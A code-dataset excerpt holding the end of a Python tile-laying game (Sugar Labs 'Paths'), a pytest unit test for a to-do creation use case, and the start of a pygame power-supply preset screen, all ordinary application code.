self._activity.nick:\n self.hands.append(Hand(\n self.tile_width, self.tile_height, remote=True))\n self.hands[i].deal(self.deck)\n self._activity.send_event(\"h\",\n self.hands[i].serialize(buddy=buddy))\n\n # As initiator, you take the first turn.\n self.its_my_turn()\n\n # If we are joining, we need to wait for a hand.\n else:\n self._my_hand = self.buddies.index(self._activity.nick)\n self.its_their_turn(self.buddies[1]) # Sharer will be buddy 1\n\n def we_are_sharing(self):\n ''' If we are sharing, there is more than one buddy. '''\n if len(self.buddies) > 1:\n return True\n\n def _set_label(self, string):\n ''' Set the label in the toolbar or the window frame. '''\n if self._running_sugar:\n self._activity.status.set_label(string)\n self._activity.score.set_label(_('Score: ') + str(self.score))\n elif hasattr(self, 'win'):\n self.win.set_title('%s: %s [%d]' % (_('Paths'), string,\n self.score))\n\n def its_my_turn(self):\n # I need to play a piece...\n self.placed_a_tile = False\n # and I am no longer waiting for my turn.\n self._waiting_for_my_turn = False\n # If I don't have any tiles left, time to redeal.\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n self._redeal()\n if self._running_sugar:\n self._activity.set_player_on_toolbar(self._activity.nick)\n self._activity.dialog_button.set_icon_name('go-next')\n self._activity.dialog_button.set_tooltip(\n _('Click after taking your turn.'))\n self._set_label(_('It is your turn.'))\n\n def _redeal(self):\n # Only the sharer deals tiles.\n if not self.we_are_sharing():\n self.hands[self._my_hand].deal(self.deck)\n if self.playing_with_robot:\n self.hands[ROBOT_HAND].deal(self.deck)\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n if self._running_sugar:\n self._activity.dialog_button.set_icon_name(\n 'media-playback-stop-insensitive')\n self._activity.dialog_button.set_tooltip(_('Game over'))\n self.game_over()\n elif self._initiating():\n if self.deck.empty():\n self.game_over()\n return\n if self.deck.tiles_remaining() < COL * len(self.buddies):\n number_of_tiles_to_deal = \\\n int(self.deck.tiles_remaining() / len(self.buddies))\n if number_of_tiles_to_deal == 0:\n number_of_tiles_to_deal = 1 # Deal last tile in deck.\n else:\n number_of_tiles_to_deal = COL\n for i, nick in enumerate(self.buddies):\n self.hands[i].deal(self.deck, number_of_tiles_to_deal)\n # Send the joiners their new hands.\n if nick != self._activity.nick:\n self._activity.send_event(\"h\",\n (self.hands[i].serialize(buddy=nick)))\n\n def took_my_turn(self):\n # Did I complete my turn without any errors?\n if self._there_are_errors:\n self._set_label(_('There are errors—it is still your turn.'))\n return\n\n # After the tile is placed, expand regions of playable grid squares.\n self.show_connected_tiles()\n\n # Are there any completed paths?\n self._test_for_complete_paths(self._last_grid_played)\n\n # If so, let everyone know what piece I moved.\n if self.we_are_sharing():\n self._activity.send_event(\"p\", json_dump([self._last_tile_played,\n self._last_tile_orientation,\n self._last_grid_played]))\n\n self._last_tile_orientation = 0 # Reset orientation.\n # I took my turn, so I am waiting again.\n self._waiting_for_my_turn = True\n if self.last_spr_moved is not None:\n self.last_spr_moved.set_layer(TILES)\n self.last_spr_moved = None\n self._hide_highlight()\n self._set_label(_('You took your turn.'))\n\n if self.playing_with_robot:\n self.its_their_turn(_('robot'))\n self._waiting_for_robot = True\n gobject.timeout_add(1000, self._robot_turn)\n elif not self.we_are_sharing():\n if self.deck.empty() and \\\n self.hands[self._my_hand].tiles_in_hand() == 0:\n self.game_over()\n else:\n self.its_my_turn()\n elif self._initiating():\n self.whos_turn += 1\n if self.whos_turn == len(self.buddies):\n self.whos_turn = 0\n else:\n self.its_their_turn(self.buddies[self.whos_turn])\n self._activity.send_event(\"t\", self.buddies[self.whos_turn])\n\n def _robot_turn(self):\n self._robot_play()\n self.show_connected_tiles()\n if not self._waiting_for_robot:\n self.its_my_turn()\n\n def its_their_turn(self, nick):\n # It is someone else's turn.\n if self._running_sugar:\n if not self.playing_with_robot:\n self._activity.set_player_on_toolbar(nick)\n self._activity.dialog_button.set_icon_name('media-playback-stop')\n self._activity.dialog_button.set_tooltip(_('Wait your turn.'))\n self._set_label(_('Waiting for') + ' ' + nick)\n self._waiting_for_my_turn = True # I am still waiting.\n\n def _button_press_cb(self, win, event):\n win.grab_focus()\n x, y = map(int, event.get_coords())\n\n self._dragpos = [x, y]\n self._total_drag = [0, 0]\n\n spr = self._sprites.find_sprite((x, y))\n\n # If it is not my turn, do nothing.\n if self._waiting_for_my_turn:\n self._press = None\n return\n\n self._release = None\n\n # Ignore clicks on background except to indicate you took your turn\n if spr is None or spr in self.grid.blanks or spr == self.deck.board:\n if self.placed_a_tile and spr is None:\n self.took_my_turn()\n self._press = None\n return True\n\n # Are we clicking on a tile in the hand?\n if self.hands[self._my_hand].spr_to_hand(spr) is not None and \\\n not self._there_are_errors:\n self.last_spr_moved = spr\n clicked_in_hand = True\n if self.placed_a_tile:\n self._press = None\n self.took_my_turn()\n else:\n clicked_in_hand = False\n\n # We cannot switch to an old tile.\n if spr == self.last_spr_moved:\n self._press = spr\n\n spr.set_layer(TOP)\n self._show_highlight()\n return True\n\n def _mouse_move_cb(self, win, event):\n \"\"\" Drag a tile with the mouse. \"\"\"\n spr = self._press\n if spr is None:\n self._dragpos = [0, 0]\n return True\n win.grab_focus()\n x, y = map(int, event.get_coords())\n dx = x - self._dragpos[0]\n dy = y - self._dragpos[1]\n spr.move_relative([dx, dy])\n self._move_relative_highlight([dx, dy])\n self._dragpos = [x, y]\n self._total_drag[0] += dx\n self._total_drag[1] += dy\n\n def _button_release_cb(self, win, event):\n win.grab_focus()\n\n self._dragpos = [0, 0]\n\n if self._waiting_for_my_turn:\n return\n\n if self._press is None:\n return\n\n x, y = map(int, event.get_coords())\n spr = self._sprites.find_sprite((x, y))\n self._release = spr\n grid_pos = self.grid.xy_to_grid(x, y)\n hand_pos = self.hands[self._my_hand].xy_to_hand(x, y)\n\n # Placing tile in grid\n if grid_pos is not None and self._it_is_a_drag() and \\\n self.grid.blanks[grid_pos].get_layer() > HIDE:\n\n # Moving to an empty grid position\n if self.grid.grid[grid_pos] is None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n # If the tile was previously in the grid, empty its old pos.\n i = self.grid.spr_to_grid(self._press)\n if i is not None:\n self.grid.grid[i] = None\n\n # Assign the tile to the new grid position.\n self.grid.grid[grid_pos] = tile\n self.placed_a_tile = True\n self._last_tile_played = tile.number\n self._last_grid_played = grid_pos\n\n # If the tile came from the hand, empty its old position.\n i = self.hands[self._my_hand].spr_to_hand(self._press)\n if i is not None:\n self.hands[self._my_hand].hand[i] = None\n\n # Remember which tile moved.\n if self.last_spr_moved != tile.spr:\n self.last_spr_moved = tile.spr\n\n self._show_highlight()\n # Returning tile to hand\n elif hand_pos is not None:\n # Make sure there is somewhere to place the tile.\n empty = self.hands[self._my_hand].find_empty_slot()\n if empty is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.hands[self._my_hand].hand_to_xy(empty))\n # Did the tile come from elsewhere in the hand?\n if self.hands[self._my_hand].spr_to_hand(\n self._press) is not None:\n self.hands[self._my_hand].hand[self.hands[\n self._my_hand].spr_to_hand(self._press)] = None\n # or from the grid?\n elif self.grid.spr_to_grid(self._press) is not None:\n self.grid.grid[self.grid.spr_to_grid(self._press)] = None\n self.hands[self._my_hand].hand[empty] = tile\n\n # Remember which tile moved.\n if spr == self.last_spr_moved:\n self.last_spr_moved = None\n\n self._hide_errormsgs()\n self._there_are_errors = False\n else: # Or return tile to the grid\n grid_pos = self.grid.spr_to_grid(self._press)\n if grid_pos is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n\n self._hide_highlight()\n self._press = None\n self._release = None\n self.placed_a_tile = False\n return True\n # Rotate\n elif self._press == self._release and not self._it_is_a_drag():\n tile = self.deck.spr_to_tile(spr)\n tile.rotate_clockwise()\n self._last_tile_orientation = tile.orientation\n\n # Remember which tile moved.\n if self.last_spr_moved != tile.spr:\n self.last_spr_moved = tile.spr\n self._show_highlight()\n\n # In limbo: return to grid\n if hand_pos is None and x < self.grid.left:\n grid_pos = self.grid.spr_to_grid(self._press)\n if grid_pos is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n self._hide_highlight()\n\n self._snap_to_grid(self._release)\n self._test_for_bad_paths(self.grid.spr_to_grid(self._press))\n self._press = None\n self._release = None\n return True\n\n def _snap_to_grid(self, spr):\n ''' make sure a tile is aligned in its grid position '''\n for i in range(COL * ROW):\n if self.grid.grid[i] is not None:\n self.grid.grid[i].spr.move(self.grid.grid_to_xy(i))\n if self.grid.grid[i].spr == spr:\n self._move_highlight(self.grid.grid_to_xy(i))\n\n def _it_is_a_drag(self):\n ''' The movement was large enough to be consider a drag as opposed\n to a tile rotate. '''\n if self._total_drag[0] * self._total_drag[0] + \\\n self._total_drag[1] * self._total_drag[1] > \\\n self.tile_width * self.tile_height:\n return True\n return False\n\n def _shuffle_up(self, hand):\n ''' Shuffle all the tiles in a hand to the top. '''\n for i, tile in enumerate(self.hands[hand].hand):\n empty = self.hands[hand].find_empty_slot()\n if i > 0 and tile is not None and empty is not None:\n tile.spr.move(self.hands[hand].hand_to_xy(empty))\n self.hands[hand].hand[empty] = tile\n self.hands[hand].hand[i] = None\n\n def game_over(self, msg=_('Game over')):\n ''' Nothing left to do except show the results. '''\n self._set_label(msg)\n self.saw_game_over = True\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n self.score += 50 # Bonus points\n else:\n for tile in self.hands[self._my_hand].hand:\n if tile is not None:\n self.score -= 2 * tile.get_value() # Penalty\n self._shuffle_up(self._my_hand)\n if self._running_sugar:\n self._activity.score.set_label(_('Score: ') + str(self.score))\n self._score_card.set_label(str(self.score))\n self._score_card.set_layer(OVER_THE_TOP)\n self._score_card.move((int(self.tile_width / 2),\n int(self._height / 2) + 2 * self.tile_height))\n if self.playing_with_robot:\n self._shuffle_up(ROBOT_HAND)\n for tile in range(COL):\n if self.hands[ROBOT_HAND].hand[tile] is not None:\n x, y = self.hands[ROBOT_HAND].hand_to_xy(tile)\n self.hands[ROBOT_HAND].hand[tile].spr.move(\n (self.grid.left_hand + self.grid.xinc, y))\n if self._running_sugar:\n self._activity.set_robot_status(False, 'robot-off')\n elif self.we_are_sharing():\n self._activity.send_event(\"g\", \" \")\n\n def show_connected_tiles(self):\n ''' Highlight the squares that surround the tiles already on the grid.\n '''\n for i in range(ROW * COL):\n if self._connected(i):\n self.grid.blanks[i].set_layer(GRID)\n else:\n self.grid.blanks[i].set_layer(HIDE)\n\n def _connected(self, tile):\n ''' Does tile abut the path? '''\n if self.grid.grid.count(None) == ROW * COL:\n return True\n if self.grid.grid[tile] is not None: # already has a tile\n return False\n # Looking north\n if tile >= COL and self.grid.grid[tile + OFFSETS[0]] is not None:\n return True\n # Looking east\n if tile % ROW < ROW - 1 and \\\n self.grid.grid[tile + OFFSETS[1]] is not None:\n return True\n # Looking south\n if tile < (ROW - 1) * COL and \\\n self.grid.grid[tile + OFFSETS[2]] is not None:\n return True\n # Looking west\n if tile % ROW > 0 and self.grid.grid[tile + OFFSETS[3]] is not None:\n return True\n return False\n\n def give_a_hint(self):\n ''' Try to find an open place on the grid for any tile in my_hand. '''\n order = self.deck.random_order(ROW * COL)\n for i in range(ROW * COL):\n if self._connected(order[i]):\n for tile in self.hands[self._my_hand].hand:\n if self._try_placement(tile, order[i]):\n # Success, so give hint.\n self.grid.grid[order[i]] = None\n self._show_highlight(\n pos=self.grid.grid_to_xy(order[i]))\n return\n # Nowhere to play.\n self.game_over(_('Nowhere to play.'))\n\n def _robot_play(self):\n ''' The robot tries random tiles in random locations. '''\n # TODO: strategy try to complete paths\n order = self.deck.random_order(ROW * COL)\n for i in range(ROW * COL):\n if self._connected(order[i]):\n for tile in self.hands[ROBOT_HAND].hand:\n if self._try_placement(tile, order[i]):\n # Success, so remove tile from hand.\n self.hands[ROBOT_HAND].hand[\n self.hands[ROBOT_HAND].hand.index(tile)] = None\n tile.spr.move(self.grid.grid_to_xy(order[i]))\n tile.spr.set_layer(TILES)\n self._waiting_for_robot = False\n return\n\n # If we didn't return above, we were unable to play a tile.\n self.game_over(_('Robot unable to play'))\n\n def _try_placement(self, tile, i):\n ''' Try to place a tile at grid posiion i. Rotate it, if necessary. '''\n if tile is None:\n return False\n self.grid.grid[i] = tile\n for j in range(4):\n self._test_for_bad_paths(i)\n if not self._there_are_errors:\n return True\n tile.rotate_clockwise()\n self.grid.grid[i] = None\n return False\n\n def _test_for_complete_paths(self, tile):\n ''' Did this tile complete a path? (or two paths?) '''\n\n # A tile can complete up to two paths.\n self._paths = [[], []]\n break_in_path = [False, False]\n\n # Seed the paths and lists with the current tile.\n if tile is not None:\n self._add_to_path_list(tile, 0, 0)\n if len(self.grid.grid[tile].paths) == 2:\n self._add_to_path_list(tile, 1, 1)\n\n # Walk the path.\n for p in range(2):\n tile, path = self._tile_to_test(p)\n while(tile is not None):\n self._test(tile, path, p, self._test_a_neighbor)\n self._tile_has_been_tested(tile, path, p)\n tile, path = self._tile_to_test(p)\n # Is the path complete?\n for i in self._paths[p]:\n if not self._test(i[0], i[1], None, self._test_a_connection):\n break_in_path[p] = True\n if not break_in_path[p] and len(self._paths[p]) > 0:\n for i in self._paths[p]:\n self.grid.grid[i[0]].set_shape(i[1])\n self.score += self.grid.grid[i[0]].get_value()\n\n def _tile_to_test(self, test_path):\n ''' Find a tile that needs testing. '''\n for i in self._paths[test_path]:\n if i[2] is False:\n return i[0], i[1]\n return None, None\n\n def _add_to_path_list(self, tile, tile_path, test_path):\n ''' Only add a tile to the path if it is not already there. '''\n for i in self._paths[test_path]:\n if i[0] == tile and i[1] == tile_path:\n return\n self._paths[test_path].append([tile, tile_path, False])\n\n def _tile_has_been_tested(self, tile, tile_path, test_path):\n ''' Mark a tile as tested. '''\n for i in self._paths[test_path]:\n if i[0] == tile and i[1] == tile_path:\n i[2] = True\n return\n\n def _test(self, tile, tile_path, test_path, test):\n ''' Test each neighbor of a block for a connecting path. '''\n if tile is None:\n return False\n for i in range(4):\n if not test(tile, tile_path, test_path, i, tile + OFFSETS[i]):\n return False\n return True\n\n def _test_a_connection(self, tile, tile_path, test_path, direction,\n neighbor):\n ''' Is there a break in the connection? If so return False. '''\n if self.grid.grid[tile].paths[tile_path][direction] == 1:\n if self.grid.grid[neighbor] is None:\n return False\n # Which of the neighbor's paths are we connecting to?\n if len(self.grid.grid[neighbor].paths) == 1:\n if self.grid.grid[neighbor].paths[0][(direction + 2) % 4] == 0:\n return False\n else:\n return True\n if self.grid.grid[neighbor].paths[0][(direction + 2) % 4] == 0 and\\\n self.grid.grid[neighbor].paths[1][(direction + 2) % 4] == 0:\n return False\n return True\n\n def _test_a_neighbor(self, tile, tile_path, test_path, direction,\n neighbor):\n ''' Are we connected to a neighbor's path? If so, add the neighbor\n to our paths list and to the list of tiles that need to be tested. '''\n if self.grid.grid[tile].paths[tile_path][direction] == 1:\n if self.grid.grid[neighbor] is not None:\n if not neighbor in self._paths[test_path]:\n # Which of the neighbor's paths are we connecting to?\n if self.grid.grid[neighbor].paths[0][\n (direction + 2) % 4] == 1:\n self._add_to_path_list(neighbor, 0, test_path)\n elif len(self.grid.grid[neighbor].paths) == 2 and \\\n self.grid.grid[neighbor].paths[1][\n (direction + 2) % 4] == 1:\n self._add_to_path_list(neighbor, 1, test_path)\n return True\n\n def _test_for_bad_paths(self, tile):\n ''' Is there a path to nowhere? '''\n self._hide_errormsgs()\n self._there_are_errors = False\n if tile is not None:\n self._check_tile(tile, [int(tile / COL), 0], NORTH,\n tile + OFFSETS[0])\n self._check_tile(tile, [tile % ROW, ROW - 1], EAST,\n tile + OFFSETS[1])\n self._check_tile(tile, [int(tile / COL), COL - 1], SOUTH,\n tile + OFFSETS[2])\n self._check_tile(tile, [tile % ROW, 0], WEST, tile + OFFSETS[3])\n\n def _check_tile(self, i, edge_check, direction, neighbor):\n ''' Can a tile be placed at position i? '''\n if edge_check[0] == edge_check[1]:\n for path in self.grid.grid[i].paths:\n if path[direction] == 1:\n self._display_errormsg(i, direction)\n else:\n if self.grid.grid[neighbor] is not None:\n my_path = 0\n your_path = 0\n for c in self.grid.grid[i].paths:\n if c[direction] == 1:\n my_path = 1\n for c in self.grid.grid[neighbor].paths:\n if c[(direction + 2) % 4] == 1:\n your_path = 1\n if my_path != your_path:\n self._display_errormsg(i, direction)\n\n def _display_errormsg(self, i, direction):\n ''' Display an error message where and when appropriate. '''\n if self._press is not None:\n dxdy = [[0.375, -0.125], [0.875, 0.375], [0.375, 0.875],\n [-0.125, 0.375]]\n x, y = self._press.get_xy()\n self._errormsg[direction].move(\n (x + dxdy[direction][0] * self.tile_width,\n y + dxdy[direction][1] * self.tile_height))\n self._errormsg[direction].set_layer(OVER_THE_TOP)\n self._there_are_errors = True\n\n def _hide_errormsgs(self):\n ''' Hide all the error messages. '''\n for i in range(4):\n self._errormsg[i].move((self.grid.left, self.grid.top))\n self._errormsg[i].set_layer(HIDE)\n\n def _hide_highlight(self):\n ''' No tile is selected. '''\n for i in range(4):\n self._highlight[i].move((self.grid.left, self.grid.top))\n self._highlight[i].set_layer(HIDE)\n\n def _move_relative_highlight(self, pos):\n for i in range(4):\n self._highlight[i].move_relative(pos)\n\n def _move_highlight(self, pos):\n x, y = pos\n self._highlight[0].move((x, y))\n self._highlight[1].move((x + 7 * self.tile_width / 8, y))\n self._highlight[2].move((x + 7 * self.tile_width / 8,\n y + 7 * self.tile_height / 8))\n self._highlight[3].move((x, y + 7 * self.tile_height / 8))\n\n def _show_highlight(self, pos=None):\n ''' Highlight the tile that is selected. '''\n if self.last_spr_moved is None and pos is None:\n self._hide_highlight()\n else:\n if pos is None:\n x, y = self.last_spr_moved.get_xy()\n else: # Giving a hint.\n x, y = pos\n self._move_highlight((x, y))\n for i in range(4):\n self._highlight[i].set_layer(OVER_THE_TOP)\n\n def _keypress_cb(self, area, event):\n return True\n\n def _draw_cb(self, win, context):\n ''' Callback to handle window expose events '''\n self.do_draw(context)\n return True\n\n def do_draw(self, cr):\n ''' Handle the expose-event by drawing '''\n # Restrict Cairo to the exposed area\n alloc = self._canvas.get_allocation()\n\n cr.rectangle(alloc.x, alloc.y, alloc.width, alloc.height)\n cr.clip()\n # Refresh sprite list\n self._sprites.redraw_sprites(cr=cr)\n\n def _destroy_cb(self, win, event):\n Gtk.main_quit()\n\n", "repo_name": "sugarlabs/paths", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 30963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "sugar3.graphics.style.GRID_CELL_SIZE", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sugar3.graphics.style", "line_number": 7, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 22, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 43, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 44, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 45, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.width", "line_number": 52, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 52, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.height", "line_number": 53, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 53, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 53, "usage_type": "name"}, {"api_name": "constants.TILE_HEIGHT", "line_number": 54, "usage_type": "name"}, {"api_name": "constants.TILE_WIDTH", "line_number": 55, "usage_type": "name"}, {"api_name": "constants.TILE_HEIGHT", "line_number": 56, "usage_type": "name"}, {"api_name": "sprites.Sprites", "line_number": 59, "usage_type": "call"}, {"api_name": "grid.Grid", "line_number": 60, "usage_type": "call"}, {"api_name": "deck.Deck", "line_number": 63, "usage_type": "call"}, {"api_name": "hand.Hand", "line_number": 66, "usage_type": "call"}, {"api_name": "tile.error_graphic", "line_number": 69, "usage_type": "call"}, {"api_name": "tile.highlight_graphic", "line_number": 70, "usage_type": "call"}, {"api_name": "tile.blank_tile", "line_number": 71, "usage_type": "call"}, {"api_name": "hand.clear", "line_number": 91, "usage_type": "call"}, {"api_name": "constants.HIDE", "line_number": 110, "usage_type": "argument"}, {"api_name": "hand.Hand", "line_number": 142, "usage_type": "call"}, {"api_name": "hand.Hand", "line_number": 149, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 172, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 174, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 189, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 190, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 202, "usage_type": "call"}, {"api_name": "constants.COL", "line_number": 208, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 214, "usage_type": "name"}, {"api_name": "gettext.gettext", "line_number": 225, "usage_type": "call"}, {"api_name": "utils.json_dump", "line_number": 236, "usage_type": "call"}, {"api_name": "constants.TILES", "line_number": 244, "usage_type": "argument"}, {"api_name": "gettext.gettext", "line_number": 247, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 250, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 279, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 280, "usage_type": "call"}, {"api_name": "constants.TOP", "line_number": 321, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 360, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 365, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tile.number", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 383, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 384, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 393, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 393, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 414, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 414, "usage_type": "attribute"}, {"api_name": "tile.rotate_clockwise", "line_number": 424, "usage_type": "call"}, {"api_name": "tile.orientation", "line_number": 425, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 428, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 429, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 437, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 437, "usage_type": "attribute"}, {"api_name": "constants.COL", "line_number": 448, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 448, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 468, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 468, "usage_type": "attribute"}, {"api_name": "gettext.gettext", "line_number": 472, "usage_type": "call"}, {"api_name": "tile.get_value", "line_number": 481, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 484, "usage_type": "call"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 486, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 491, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 504, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 504, "usage_type": "name"}, {"api_name": "constants.GRID", "line_number": 506, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 508, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 512, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 512, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 517, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 520, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 524, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 524, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 528, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 534, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 534, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 535, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 535, "usage_type": "name"}, {"api_name": "gettext.gettext", "line_number": 545, "usage_type": "call"}, {"api_name": "constants.ROW", "line_number": 550, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 550, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 551, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 551, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 558, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 558, "usage_type": "attribute"}, {"api_name": "tile.spr.set_layer", "line_number": 559, "usage_type": "call"}, {"api_name": "constants.TILES", "line_number": 559, "usage_type": "argument"}, {"api_name": "tile.spr", "line_number": 559, "usage_type": "attribute"}, {"api_name": "gettext.gettext", "line_number": 564, "usage_type": "call"}, {"api_name": "tile.rotate_clockwise", "line_number": 575, "usage_type": "call"}, {"api_name": "constants.NORTH", "line_number": 677, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 677, "usage_type": "name"}, {"api_name": "constants.EAST", "line_number": 679, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 679, "usage_type": "name"}, {"api_name": "constants.SOUTH", "line_number": 681, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 681, "usage_type": "name"}, {"api_name": "constants.WEST", "line_number": 683, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 683, "usage_type": "name"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 713, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 720, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 726, "usage_type": "argument"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 751, "usage_type": "argument"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 772, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 772, "usage_type": "name"}]} +{"seq_id": "16147226662", "text": "import pytest\nfrom unittest import mock\nimport uuid\n\nfrom src.application.todo.CreateTodo import CreateTodo\nfrom src.domain.user.errors import UserNotFoundError\n\n\n@pytest.fixture\ndef todo():\n return {\n 'uid': 'test',\n 'content': 'test content'\n }\n\n\ndef test_create_todo(todo):\n repo = mock.Mock()\n user_repo = mock.Mock()\n id = str(uuid.uuid4())\n repo.generate_id.return_value = id\n create_todo = CreateTodo(repo, user_repo)\n inputs = CreateTodo.Inputs(**todo)\n result = create_todo(inputs)\n repo.persist.assert_called_once_with({\n 'uid': todo['uid'],\n 'content': todo['content'],\n 'id': id\n })\n repo.generate_id.assert_called_once()\n user_repo.exists.assert_called_once()\n user_repo.add_todo.assert_called_once_with(todo['uid'], id)\n assert result.content == todo['content']\n assert result.id == id\n\n\ndef test_should_fail_if_user_does_not_exist(todo):\n repo = mock.Mock()\n user_repo = mock.Mock()\n user_repo.exists.return_value = False\n create_todo = CreateTodo(repo, user_repo)\n inputs = CreateTodo.Inputs(**todo)\n with pytest.raises(UserNotFoundError):\n create_todo(inputs)\n", "repo_name": "juansensio/architecture", "sub_path": "src/tests/unit/test_create_todo.py", "file_name": "test_create_todo.py", "file_ext": "py", "file_size_in_byte": 1185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 9, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 18, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 19, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 20, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 22, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo.Inputs", "line_number": 23, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 23, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 38, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 38, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 39, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 39, "usage_type": "name"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 41, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo.Inputs", "line_number": 42, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 42, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 43, "usage_type": "call"}, {"api_name": "src.domain.user.errors.UserNotFoundError", "line_number": 43, "usage_type": "argument"}]} +{"seq_id": "71679802087", "text": "#!/usr/bin/env python\nimport time\nimport serial\n\nimport pygame\n\nfrom pygame.locals import *\nfrom ui import widgets, surface\nimport psu\n\nimport random\n\n\nclass PresetScreen(object):\n def __init__(self, display, psu, parent):\n self.display = display\n self.parent = parent\n self.psu = psu\n self.active = False\n\n self.screen = widgets.Pannel(display)\n\n frame = self.screen.addWidget(widgets.Frame,\n \"Select preset\", 2, 2, 318, 238)\n\n frame.addWidget(widgets.Button, \"3.3 / -3.3\", 2, 2, 120, 40,\n self.setPreset(3300))\n frame.addWidget(widgets.Button, \"5 / -5\", 2, 47, 